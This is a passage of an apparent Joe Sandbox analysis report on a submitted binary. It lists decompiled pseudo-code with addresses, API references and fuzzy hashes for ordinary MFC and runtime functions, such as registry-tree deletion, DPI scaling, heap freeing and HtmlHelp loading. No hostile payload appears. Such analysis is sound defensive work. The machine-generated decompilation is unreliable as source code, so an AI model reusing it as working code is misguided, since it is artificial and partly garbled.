							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
							goto L3;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							__eax = E00413008( *(__ebp + 8));
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L4;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							L3:
							 *_t59 = 0xb;
							goto L4;
						case 4:
							__eax = E0040EA5E();
							__ecx = __ebp + 0xc;
							__eax = E0040320E(__ebp + 0xc, __eax);
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E00403478(__ebp + 0xc, 0xf1c0);
							goto L19;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							__eax = GetThreadLocale();
							 *(__esi + 8) = __eax;
							goto L4;
						case 6:
							__eflags =  *(__esi + 0x5c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x20));
								__ecx = __ebp - 0x20;
								__eax = E0040E75E(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x60) = __eax;
								__eax = E0040E7B2(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x60);
							} else {
								__esi =  *(__esi + 0x5c);
							}
							 *(__eax + 8) = __esi;
							goto L4;
						case 7:
							__eflags =  *(__esi + 0x64);
							if(__eflags != 0) {
								L15:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x64);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
								__eax =  *(__esi + 0x64);
								 *(__edi + 8) = __eax;
								goto L4;
							} else {
								__ecx =  *(__esi + 0x20);
								__eax = E00411C9F( *(__esi + 0x20));
								__ecx = __esi;
								__eax = E00412822(__ebx, __esi, __edi, __esi, __eflags, __eax);
								__eflags =  *(__esi + 0x64);
								if( *(__esi + 0x64) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							}
							goto L22;
						case 8:
							__eax = E0040EA5E();
							__ecx = __ebp + 0xc;
							__eax = E0040320E(__ebp + 0xc, __eax);
							_t44 = __ebp - 4;
							 *_t44 =  *(__ebp - 4) & 0x00000000;
							__eflags =  *_t44;
							L19:
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E0040A240(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							 *(__esi + 8) = __eax;
							__eax = E00403036( *(__ebp + 0xc) + 0xfffffff0, __edx);
							L4:
							_t56 = 1;
							goto L22;
						case 9:
							goto L21;
					}
				}
				L22:
				return E0041F7C2(_t56);
			}

0x0041295b
0x00412962
0x0041296c
0x00412975
0x00412ae8
0x00412ae8
0x0041297b
0x00412982
0x00000000
0x004129a8
0x004129ab
0x004129b0
0x00000000
0x00000000
0x00412989
0x0041298c
0x00000000
0x00000000
0x00412a5c
0x00412a5f
0x00412a62
0x00412a67
0x00412a6c
0x00412a6e
0x00412a70
0x00000000
0x00000000
0x0041299e
0x004129a1
0x00412991
0x00412991
0x00000000
0x00000000
0x00412ac4
0x00412aca
0x00412acd
0x00412ad7
0x00412ada
0x00412ae1
0x00000000
0x00000000
0x00412a79
0x00412a7c
0x00412a81
0x00412a87
0x00000000
0x00000000
0x004129b8
0x004129bc
0x004129be
0x004129c1
0x004129c4
0x004129da
0x004129ec
0x004129ef
0x004129f5
0x004129f8
0x004129fb
0x004129fb
0x00412a00
0x00412a06
0x00412a09
0x00412a0e
0x00412a15
0x00412a10
0x00412a10
0x00412a10
0x00412a18
0x00000000
0x00000000
0x00412a20
0x00412a24
0x00412a40
0x00412a40
0x00412a43
0x00412a48
0x00412a4b
0x00412a4d
0x00412a4e
0x00412a51
0x00412a54
0x00000000
0x00412a26
0x00412a26
0x00412a29
0x00412a2f
0x00412a31
0x00412a36
0x00412a3a
0x00000000
0x00000000
0x00000000
0x00000000
0x00412a3a
0x00000000
0x00000000
0x00412a8f
0x00412a95
0x00412a98
0x00412a9d
0x00412a9d
0x00412a9d
0x00412aa1
0x00412aa1
0x00412aa4
0x00412aa7
0x00412aac
0x00412ab1
0x00412ab4
0x00412ab7
0x00412aba
0x00412996
0x00412998
0x00000000
0x00000000
0x00000000
0x00000000
0x00412982
0x00412aea
0x00412aef

APIs

__EH_prolog3.LIBCMT ref: 00412962
SendMessageA.USER32(?,00000138,?,?), ref: 004129DA
GetBkColor.GDI32(?), ref: 004129E3
GetTextColor.GDI32(?), ref: 004129EF
GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 00412A81

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Color$H_prolog3LocaleMessageSendTextThread
String ID:
API String ID: 187318432-0
Opcode ID: e95946eb13d09b0138d39ad7df32a0f0b4675811a65c7620a99874e0fb4b9fbf
Instruction ID: 105b4171879299afdcc85ecd79fbceca975293f7ace257aaf3855ae8da3ba32c
Opcode Fuzzy Hash: e95946eb13d09b0138d39ad7df32a0f0b4675811a65c7620a99874e0fb4b9fbf
Instruction Fuzzy Hash: 8E419D71500305DFCB20DF65C944ADE77B0FF04314F10896EE896AB3A1D7B8A9A1CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00405482, Relevance: 7.6, APIs: 5, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00405482(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				intOrPtr _t43;
				void* _t44;
				char** _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x443590; // 0xa920217c
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E0041F71D(E00431D33, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						_push(_t59);
						E00403667(_t42, _t59 - 0x14, _t54, _t57, _t66);
						 *(_t59 - 4) = 1;
						_t57 = E00405482(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E00403036( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E0041E5DF(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}

0x00405482
0x00405489
0x0040548d
0x00405494
0x0040549a
0x004054a1
0x004054a6
0x004054ae
0x004054b4
0x004054ba
0x004054bd
0x004054c0
0x004054c6
0x004054ca
0x004054d0
0x004054de
0x004054e4
0x004054e6
0x004054e8
0x00000000
0x00000000
0x004054ea
0x004054f0
0x004054f4
0x00405500
0x0040550c
0x00405510
0x00405516
0x0040551a
0x00405521
0x00405523
0x00000000
0x00405523
0x00000000
0x00405521
0x00405544
0x0040554a
0x00405554
0x0040555f
0x0040554c
0x0040554c
0x00405552
0x00000000
0x00000000
0x00405552
0x00405564
0x00405564
0x0040556f
0x00405577
0x00405578
0x00405579
0x00405582
0x00405587
0x0040558e

APIs

__EH_prolog3_catch.LIBCMT ref: 004054A1
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 004054C0
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 004054DE
RegDeleteKeyA.ADVAPI32(?,?), ref: 00405559
RegCloseKey.ADVAPI32(?), ref: 00405564

Part of subcall function 00403667: __EH_prolog3.LIBCMT ref: 0040366E

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
String ID:
API String ID: 301487041-0
Opcode ID: ef6aa7cf2f3b8b7d913693d12d450bc24d80ee2784bfb5f8f524b31fd861a622
Instruction ID: b1f98a2856fb891a4ad2f1730a2dfbfc327df959dd0772622e21178d5af673db
Opcode Fuzzy Hash: ef6aa7cf2f3b8b7d913693d12d450bc24d80ee2784bfb5f8f524b31fd861a622
Instruction Fuzzy Hash: 7921CC76900219ABDB25DFA4CC41AEEB7B4FB08314F10013AED95B73D0DB385E448BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A5D4, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041A5D4(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x446590; // 0x60
					_t12 =  *0x446594; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E0040E4C1(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

0x0041a5d7
0x0041a5da
0x0041a5df
0x0041a62b
0x0041a631
0x00000000
0x0041a5e1
0x0041a5ea
0x0041a5ef
0x0041a625
0x0041a627
0x0041a636
0x0041a636
0x0041a648
0x0041a650
0x0041a656
0x0041a658
0x0041a5f6
0x0041a5f8
0x0041a5fc
0x0041a604
0x0041a60b
0x0041a60e
0x0041a60e
0x0041a5ef
0x0041a65f

APIs

GetMapMode.GDI32(?,?,?,?,?,?,004142E1,?,00000000,0000001C,00414C4F,?,?,?,?,?), ref: 0041A5E4
GetDeviceCaps.GDI32(?,00000058), ref: 0041A61E
GetDeviceCaps.GDI32(?,0000005A), ref: 0041A627

Part of subcall function 0040E4C1: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E501
Part of subcall function 0040E4C1: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E51E

MulDiv.KERNEL32(?,000009EC,00000060), ref: 0041A64B
MulDiv.KERNEL32(00000000,000009EC,?), ref: 0041A656

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 3008489b0365817b233b9e7bda17715b36219956bc4785caf84b3ef8eede7486
Instruction ID: b67f60aca54f694c5be954c7caf55a9921f0b6cf90a1da25102bc38903e6d2d6
Opcode Fuzzy Hash: 3008489b0365817b233b9e7bda17715b36219956bc4785caf84b3ef8eede7486
Instruction Fuzzy Hash: 22112135700A00AFDB21AF56CC44C5EBFF9EF89310B15482AFA8697360C775AC528F95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A662, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041A662(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x446590; // 0x60
					_t12 =  *0x446594; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E0040E458(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

0x0041a665
0x0041a668
0x0041a66d
0x0041a6b9
0x0041a6bf
0x00000000
0x0041a66f
0x0041a678
0x0041a67d
0x0041a6b3
0x0041a6b5
0x0041a6c4
0x0041a6c4
0x0041a6d6
0x0041a6df
0x0041a6e4
0x0041a6e6
0x0041a684
0x0041a686
0x0041a68a
0x0041a692
0x0041a699
0x0041a69c
0x0041a69c
0x0041a67d
0x0041a6ed

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,00414325,?,?,?,?,?,?), ref: 0041A672
GetDeviceCaps.GDI32(?,00000058), ref: 0041A6AC
GetDeviceCaps.GDI32(?,0000005A), ref: 0041A6B5

Part of subcall function 0040E458: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E498
Part of subcall function 0040E458: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E4B5

MulDiv.KERNEL32(?,00000060,000009EC), ref: 0041A6D9
MulDiv.KERNEL32(00000000,?,000009EC), ref: 0041A6E4

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 386dc1262c4054650f02494d28b98613bbfe5b95c5fa278da0b1572231e24210
Instruction ID: d964a8700f0a9f0458d188cf6e9d936817c2b57de253648240f01c4d5d8773f5
Opcode Fuzzy Hash: 386dc1262c4054650f02494d28b98613bbfe5b95c5fa278da0b1572231e24210
Instruction Fuzzy Hash: 2811EC36200600AFDB21AF56CC4485EBBA9EF89750B15042AEA8597360C735AC618F99

Uniqueness

Uniqueness Score: -1.00%

Function 0041E18A, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 39%

			E0041E18A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x43f4c8);
				_t8 = E00421418(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E0042145D(_t8);
				}
				if( *0x448500 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x4468d0, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E0041F8D2(_t31);
						 *_t10 = E0041F897(GetLastError());
					}
					goto L9;
				}
				E00422E2D(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E00422EA6(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E00422ED1();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E0041E1E0();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x0041e18a
0x0041e18c
0x0041e191
0x0041e196
0x0041e19b
0x0041e212
0x0041e217
0x0041e217
0x0041e1a4
0x0041e1e9
0x0041e1ea
0x0041e1f2
0x0041e1f8
0x0041e1fa
0x0041e1fc
0x0041e20f
0x0041e211
0x00000000
0x0041e1fa
0x0041e1a8
0x0041e1ae
0x0041e1b3
0x0041e1b9
0x0041e1be
0x0041e1c0
0x0041e1c1
0x0041e1c2
0x0041e1c8
0x0041e1c9
0x0041e1d0
0x0041e1d9
0x00000000
0x0041e1db
0x0041e1db
0x00000000
0x0041e1db

APIs

__lock.LIBCMT ref: 0041E1A8

Part of subcall function 00422E2D: __mtinitlocknum.LIBCMT ref: 00422E41
Part of subcall function 00422E2D: __amsg_exit.LIBCMT ref: 00422E4D
Part of subcall function 00422E2D: EnterCriticalSection.KERNEL32(D164E842,D164E842,00401B31,0041EDEB,00000004,0043F508,0000000C,004265BB,0041F8D7,0041F8D7,00000000,00000000,00000000,0042480F,00000001,00000214), ref: 00422E55

___sbh_find_block.LIBCMT ref: 0041E1B3
___sbh_free_block.LIBCMT ref: 0041E1C2
HeapFree.KERNEL32(00000000,00401B31,0043F4C8,0000000C,00422E0E,00000000,0043F5F0,0000000C,00422E46,00401B31,D164E842,00401B31,0041EDEB,00000004,0043F508,0000000C), ref: 0041E1F2
GetLastError.KERNEL32(?,?,0041F8D7,0041ED60,?,00401B31,00009618), ref: 0041E203

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: ed7969cd77516ed4267cd81e9382d96ea1eba9d66f8e0a941e0b3196f476ecab
Instruction ID: 4d9d38d2205d8855a1f8cf274a38df5ed94e4e206fa5bf874766943ed1e83e44
Opcode Fuzzy Hash: ed7969cd77516ed4267cd81e9382d96ea1eba9d66f8e0a941e0b3196f476ecab
Instruction Fuzzy Hash: E801A775A01211B6DF207BB3AC05BCF3B64AF12768F50016FF804A6191CF3C89819A5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F63E, Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F63E(long* __ecx) {
				intOrPtr _t4;
				long _t5;
				void* _t6;
				void* _t13;
				intOrPtr _t14;
				long* _t15;

				_t15 = __ecx;
				_t4 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t4 != 0) {
					do {
						_t14 =  *((intOrPtr*)(_t4 + 4));
						E0040F496(__ecx, _t4, 0);
						_t4 = _t14;
					} while (_t14 != 0);
				}
				_t5 =  *_t15;
				if(_t5 != 0xffffffff) {
					TlsFree(_t5);
				}
				_t6 = _t15[4];
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection( &(_t15[7]));
				return _t6;
			}

0x0040f63f
0x0040f641
0x0040f647
0x0040f649
0x0040f649
0x0040f651
0x0040f658
0x0040f658
0x0040f649
0x0040f65c
0x0040f661
0x0040f664
0x0040f664
0x0040f66a
0x0040f66f
0x0040f678
0x0040f67b
0x0040f682
0x0040f682
0x0040f68c
0x0040f694

APIs

TlsFree.KERNEL32(?), ref: 0040F664
GlobalHandle.KERNEL32(?), ref: 0040F672
GlobalUnlock.KERNEL32(00000000), ref: 0040F67B
GlobalFree.KERNEL32 ref: 0040F682
DeleteCriticalSection.KERNEL32 ref: 0040F68C

Part of subcall function 0040F496: EnterCriticalSection.KERNEL32(?), ref: 0040F4F3
Part of subcall function 0040F496: LeaveCriticalSection.KERNEL32(?,?), ref: 0040F503
Part of subcall function 0040F496: LocalFree.KERNEL32(?), ref: 0040F50C
Part of subcall function 0040F496: TlsSetValue.KERNEL32(?,00000000), ref: 0040F51E

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
String ID:
API String ID: 1549993015-0
Opcode ID: 4ebfcc552ce60e9350f864b909ed5a038f7db9c8f2cc127d9fe14b17d68fdd27
Instruction ID: 36f76e17889f8822f579ccbac83d4f0dccc08baf364ee29f70bbc8cc12851e33
Opcode Fuzzy Hash: 4ebfcc552ce60e9350f864b909ed5a038f7db9c8f2cc127d9fe14b17d68fdd27
Instruction Fuzzy Hash: 4BF054312006005BD7319B79AC4CAAB76A9AFE57117160A7AF815E36E0DB39EC06466C

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD88, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040AD88(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E0040FA7F(__ebx, _t25, __ebp, 0xc);
				_push(E0040A257);
				_t26 = E0040F0A3(__ebx, 0x446410, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E004037E3(_t21, 0x446410, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E0040FAEC(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E004088A1(_t21, 0x446410, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

0x0040ad88
0x0040ad88
0x0040ad88
0x0040ad8b
0x0040ad90
0x0040ad9f
0x0040ada1
0x0040ada3
0x0040ada5
0x0040ada5
0x0040adaa
0x0040adae
0x0040ade8
0x0040adea
0x00000000
0x0040adb0
0x0040adb0
0x0040adb5
0x0040adbd
0x0040adc0
0x0040adcc
0x0040add2
0x0040add4
0x0040add7
0x00000000
0x00000000
0x0040addc
0x0040ade2
0x0040ade2
0x00000000
0x0040adc2

APIs

Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FABB
Part of subcall function 0040FA7F: InitializeCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FACA
Part of subcall function 0040FA7F: LeaveCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAD7
Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAE3

Part of subcall function 0040F0A3: __EH_prolog3_catch.LIBCMT ref: 0040F0AA

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 0040ADCC
FreeLibrary.KERNEL32(?), ref: 0040ADDC

Strings

hhctrl.ocx, xrefs: 0040ADB0
HtmlHelpA, xrefs: 0040ADC6

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: 58f225088544d86e35bf3fc3a8f2d09a2203108614b982aa3c617d390dbfef24
Instruction ID: 6b69f8713619981bd23f7052f209581d6a0912bbed647a4ce728f8c290688269
Opcode Fuzzy Hash: 58f225088544d86e35bf3fc3a8f2d09a2203108614b982aa3c617d390dbfef24
Instruction Fuzzy Hash: D501D1312447029BDB20BB61DD0AB4B7AD5AF54B1AF10883FF04AB19D0C77D88209A1B

Uniqueness

Uniqueness Score: -1.00%

Function 0042CD6B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042CD6B(intOrPtr _a4) {
				intOrPtr _t2;
				struct _CRITICAL_SECTION* _t3;

				_t2 = _a4;
				if(_t2 < 0x4442e0 || _t2 > 0x444540) {
					_t3 = _t2 + 0x20;
					EnterCriticalSection(_t3);
					return _t3;
				} else {
					return E00422E2D((_t2 - 0x4442e0 >> 5) + 0x10);
				}
			}

0x0042cd6b
0x0042cd76
0x0042cd8f
0x0042cd93
0x0042cd99
0x0042cd7f
0x0042cd8e
0x0042cd8e

APIs

__lock.LIBCMT ref: 0042CD88

